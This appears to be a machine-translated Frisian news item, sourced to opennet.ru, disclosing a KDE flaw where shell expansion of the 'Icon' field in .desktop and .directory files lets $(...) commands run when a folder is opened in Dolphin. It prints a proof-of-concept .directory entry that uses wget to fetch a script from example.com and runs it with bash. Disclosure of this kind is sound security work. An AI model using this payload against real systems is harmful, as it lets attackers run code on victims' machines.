Yn KDE , wêrtroch in oanfaller willekeurige kommando's kin útfiere as in brûker in map of argyf besjocht mei spesjaal ûntwurpen ".desktop" en ".directory" triemmen. In oanfal fereasket dat de brûker gewoan in list mei bestannen yn 'e Dolphin-bestânbehearder besjen, in kwea-aardich buroblêdbestân downloade, of in fluchtoets nei it buroblêd of nei in dokumint slepe. It probleem ferskynt yn 'e hjoeddeistige frijlitting fan biblioteken en âldere ferzjes, oant KDE 4. De kwetsberens is noch altyd (CVE net tawiisd).
It probleem wurdt feroarsake troch in ferkearde ymplemintaasje fan de klasse KDesktopFile, dy't by it ferwurkjen fan de fariabele "Icon", sûnder goed ûntkommen, de wearde trochjout oan de KConfigPrivate :: expandString() funksje, dy't útwreiding fan shell spesjale karakters útfiert, ynklusyf ferwurking de strings "$(..)" as kommando's dy't moatte wurde útfierd. Yn tsjinstelling ta de easken fan 'e XDG-spesifikaasje, ymplemintaasje shell konstruksjes wurde produsearre sûnder skieden fan it type ynstellings, d.w.s. net allinich by it bepalen fan de kommandorigel fan 'e applikaasje dy't moat wurde lansearre, mar ek by it opjaan fan de standert werjûn byldkaikes.
Bygelyks om oan te fallen stjoer de brûker in zip-argyf mei in map mei in ".directory"-bestân lykas:
[Buroblêd yngong]
Type=Directory
Ikoan[$e]=$(wget${IFS}https://example.com/FILENAME.sh&&/bin/bash${IFS}FILENAME.sh)
As jo besykje de ynhâld fan it argyf te besjen yn 'e Dolphin-bestânbehearder, sil it skript https://example.com/FILENAME.sh ynladen en útfierd wurde.
Boarne: opennet.ru